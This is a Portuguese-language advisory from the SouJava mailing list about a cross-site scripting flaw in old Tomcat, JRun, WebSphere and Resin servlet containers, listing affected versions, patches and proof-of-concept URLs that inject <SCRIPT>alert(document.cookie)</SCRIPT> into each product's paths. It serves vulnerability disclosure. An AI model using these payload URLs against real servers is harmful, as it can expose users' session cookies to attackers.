Existe um cross scripting vulnerabilidade em Tomcat, JRun, Resin e Websphere que forca o ServletContainer destes produtos a retornar JavaScript para o browserpodendo fazer cross site scripting deixandoo script voltar de um servidor "trusted" assim executando scripts que o usuário na verdade não queria executar. exemplo: http://www.jspbrasil.com.br:8080/main/<SCRIPT>document.write(alert('CrossScriptingAttack'))</SCRIPT>.jsp Vulneravel: * Tomcat versões 3.2.1, 3.2.2-beta, 4.0-beta * JRun versões 2.3.3 and 3.0 * WebSphere versões 3.5 FP2, 3.02 and VisualAge for Java 3.5 Professional * Resin versões 1.2.2 Não vulneravel: * Tomcat versões 4.0-beta-2 and 3.2.2-beta-5 outros exemplos: Tomcat 3.2.1: http://Tomcat/jsp-mapped-dir/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp JRun 3.0: http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml WebSphere 3.5 FP2: http://WebSphere/webapp/examples/<SCRIPT>alert(document.cookie)</SCRIPT> WebSphere 3.02: http://WebSphere/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp VisualAge for Java 3.5 Professional: http://VisualAge-WebSphere-Test-Environment/<SCRIPT>alert(document.cookie)</SCRIPT> Resin 1.2.2: http://Reisin/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp Patches: JRun: <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full> <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full> http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full <http://www.allaire.com/handlers/index.cfm?ID=21498&Method=Full>. Websphere: http://www-4.ibm.com/software/webservers/appserv/efix.html> http://www-4.ibm.com/software/webservers/appserv/efix.html ------------------------------ LISTA SOUJAVA ---------------------------- http://www.soujava.org.br - Sociedade de Usuários Java da Sucesu-SP dúvidas mais comuns: http://www.soujava.org.br/faq.htm regras da lista: http://www.soujava.org.br/regras.htm para sair da lista: envie email para [EMAIL PROTECTED] -------------------------------------------------------------------------